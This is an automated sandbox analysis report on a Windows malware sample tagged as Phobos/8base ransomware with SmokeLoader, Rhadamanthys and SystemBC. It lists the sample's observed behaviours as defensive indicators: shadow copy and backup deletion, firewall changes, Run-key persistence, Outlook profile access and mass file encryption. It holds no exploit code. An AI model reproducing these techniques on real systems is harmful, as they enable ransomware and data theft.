Malware Analysis Report

2024-11-16 12:17

Sample ID 230713-y6mggsba78
Target caf660d5a464070e4a488bb3d2153c90204f739e75684f4d8ed56de1062b2f87
SHA256 caf660d5a464070e4a488bb3d2153c90204f739e75684f4d8ed56de1062b2f87
Tags
phobos rhadamanthys smokeloader systembc backdoor collection evasion persistence ransomware spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

caf660d5a464070e4a488bb3d2153c90204f739e75684f4d8ed56de1062b2f87

Threat Level: Known bad

The file caf660d5a464070e4a488bb3d2153c90204f739e75684f4d8ed56de1062b2f87 was found to be: Known bad.

Malicious Activity Summary

phobos rhadamanthys smokeloader systembc backdoor collection evasion persistence ransomware spyware stealer trojan upx

SystemBC

Rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Detect rhadamanthys stealer shellcode

Phobos

SmokeLoader

Renames multiple (472) files with added filename extension

Modifies boot configuration data using bcdedit

Deletes shadow copies

Downloads MZ/PE file

Modifies Windows Firewall

Deletes backup catalog

UPX packed file

Reads user/profile data of web browsers

Drops startup file

Executes dropped EXE

Looks up external IP address via web service

Adds Run key to start application

Accesses Microsoft Outlook profiles

Drops desktop.ini file(s)

Suspicious use of SetThreadContext

Drops file in Program Files directory

Unsigned PE

Program crash

Uses Task Scheduler COM API

Suspicious behavior: MapViewOfSection

Kills process with taskkill

outlook_win_path

Runs net.exe

outlook_office_path

Interacts with shadow copies

Suspicious use of AdjustPrivilegeToken

Modifies system certificate store

Enumerates processes with tasklist

Checks processor information in registry

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Uses Volume Shadow Copy service COM API

Suspicious use of WriteProcessMemory

Suspicious behavior: GetForegroundWindowSpam

GoLang User-Agent

Gathers system information

Checks SCSI registry key(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-07-13 20:23

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-07-13 20:23

Reported

2023-07-13 20:26

Platform

win10v2004-20230703-en

Max time kernel

110s

Max time network

155s

Command Line

C:\Windows\Explorer.EXE

Signatures

Detect rhadamanthys stealer shellcode

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Phobos

ransomware phobos

Rhadamanthys

stealer rhadamanthys

SmokeLoader

trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess

Description | Indicator | Process | Target
PID 2256 created 2572 | N/A | C:\Users\Admin\AppData\Local\Temp\caf660d5a464070e4a488bb3d2153c90204f739e75684f4d8ed56de1062b2f87.exe | C:\Windows\Explorer.EXE

SystemBC

trojan systembc

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A

Renames multiple (472) files with added filename extension

ransomware

Deletes backup catalog

ransomware
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A
N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\netsh.exe | N/A
N/A | N/A | C:\Windows\system32\netsh.exe | N/A

Drops startup file

Description | Indicator | Process | Target
File created | \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\o{qOsfR.exe | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Accesses Microsoft Outlook profiles

collection
Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook | C:\Windows\system32\certreq.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Windows\system32\certreq.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\explorer.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\explorer.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\explorer.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook | C:\Windows\system32\certreq.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook | C:\Windows\system32\certreq.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Windows\system32\certreq.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Windows\system32\certreq.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\o{qOsfR = "C:\\Users\\Admin\\AppData\\Local\\o{qOsfR.exe" | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\o{qOsfR = "C:\\Users\\Admin\\AppData\\Local\\o{qOsfR.exe" | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A

Drops desktop.ini file(s)

Description | Indicator | Process | Target
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | F:\$RECYCLE.BIN\S-1-5-21-1043950675-1972537973-2972532878-1000\desktop.ini | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Users\Admin\3D Objects\desktop.ini | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\$Recycle.Bin\S-1-5-21-1043950675-1972537973-2972532878-1000\desktop.ini | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files\desktop.ini | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files (x86)\desktop.ini | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | ipinfo.io | N/A | N/A
N/A | ipinfo.io | N/A | N/A
N/A | ipinfo.io | N/A | N/A
N/A | ipinfo.io | N/A | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 4464 set thread context of 3704 | N/A | C:\Users\Admin\AppData\Local\Microsoft\84`.exe | C:\Users\Admin\AppData\Local\Microsoft\84`.exe

Drops file in Program Files directory

Description | Indicator | Process | Target
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.webapp.nl_zh_4.4.0.v20140623020002.jar | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File created | C:\Program Files\Microsoft Office\root\Licenses16\MondoR_OEM_Perp-pl.xrm-ms.id[49C07676-3483].[[email protected]].8base | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-editor-mimelookup.jar | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019DemoR_BypassTrial180-ul-oob.xrm-ms | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File created | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\tt.pak.DATA.id[49C07676-3483].[[email protected]].8base | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File created | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_ja.jar.id[49C07676-3483].[[email protected]].8base | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File created | C:\Program Files\Microsoft Office\root\Client\vcruntime140.dll.id[49C07676-3483].[[email protected]].8base | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019VL_KMS_Client_AE-ul-oob.xrm-ms | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\AppIcon.targetsize-24.png | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files (x86)\Google\Update\1.3.36.151\goopdateres_bg.dll | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNotePageSmallTile.scale-125.png | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_nb_135x40.svg | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\en-US\TipTsf.dll.mui | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WorldClockWideTile.contrast-white_scale-125.png | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\MapDarkTheme.png | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File created | C:\Program Files\Mozilla Firefox\api-ms-win-crt-math-l1-1-0.dll.id[49C07676-3483].[[email protected]].8base | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Audio\Skype_Dtmf_3.m4a | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\api-ms-win-crt-string-l1-1-0.dll | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\msolap.dll.id[49C07676-3483].[[email protected]].8base | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File created | C:\Program Files\Microsoft Office\ThinAppXManifest.xml.id[49C07676-3483].[[email protected]].8base | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\Wide310x150Logo.scale-125.png | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\Weather_TileLargeSquare.scale-200.png | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\MedTile.scale-125_contrast-white.png | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\AttachmentPlaceholder-Light.png | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\BadgeLogo.scale-100_contrast-black.png | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\flavormap.properties | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsSmallTile.contrast-white_scale-200.png | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\sign-in.png | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\he-il\ui-strings.js | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\CompleteCheckmark.png | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Exchange.scale-100.png | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ja-jp\ui-strings.js | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\el.pak.DATA | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File created | C:\Program Files\Microsoft Office\root\Licenses16\ProjectProXC2RVL_KMS_ClientC2R-ppd.xrm-ms.id[49C07676-3483].[[email protected]].8base | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.OData.Core.NetFX35.V7.dll | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.NET.Native.Runtime.1.7_1.7.25531.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\Autogen\JSByteCodeCache_64 | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fr-ma\ui-strings.js.id[49C07676-3483].[[email protected]].8base | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\PackageManagementDscUtilities.psm1 | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-cn\ui-strings.js.id[49C07676-3483].[[email protected]].8base | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN111.XML | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-256_contrast-black.png | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File created | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\sr-Cyrl-BA.pak.id[49C07676-3483].[[email protected]].8base | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File created | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Cartridges\sybase.xsl.id[49C07676-3483].[[email protected]].8base | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-64_altform-unplated_contrast-white.png | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File created | C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019R_Grace-ul-oob.xrm-ms.id[49C07676-3483].[[email protected]].8base | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File created | C:\Program Files\Microsoft Office\root\Office16\1033\WINWORD_K_COL.HXK.id[49C07676-3483].[[email protected]].8base | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\RTL\contrast-black\MedTile.scale-100.png | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\tool\selector.js.id[49C07676-3483].[[email protected]].8base | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File created | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\epl-v10.html.id[49C07676-3483].[[email protected]].8base | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\Images\Ratings\Yelp9.scale-125.png | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteSectionGroupLargeTile.scale-100.png | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\pt-br\ui-strings.js.id[49C07676-3483].[[email protected]].8base | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File created | C:\Program Files\7-Zip\Lang\pl.txt.id[49C07676-3483].[[email protected]].8base | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File created | C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.contrast-black_scale-140.png.id[49C07676-3483].[[email protected]].8base | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-20_altform-lightunplated.png | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\ar.pak | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File created | C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.lv-lv.dll.id[49C07676-3483].[[email protected]].8base | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.sat4j.pb_2.3.5.v201404071733.jar | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File created | C:\Program Files\VideoLAN\VLC\plugins\demux\librawaud_plugin.dll.id[49C07676-3483].[[email protected]].8base | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\WideTile.scale-200_contrast-white.png | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fi-fi\ui-strings.js | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File created | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Web Server Extensions\16\BIN\1033\FPEXT.MSG.id[49C07676-3483].[[email protected]].8base | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\onboarding\contacts_permission_ios.gif | C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe | N/A

Checks SCSI registry key(s)

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\System32\vds.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Microsoft\84`.exe | N/A
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Microsoft\84`.exe | N/A
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Microsoft\84`.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | C:\Windows\System32\vds.exe | N/A
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\System32\vds.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 | C:\Windows\System32\vds.exe | N/A

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\certreq.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\certreq.exe | N/A

Enumerates processes with tasklist

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A
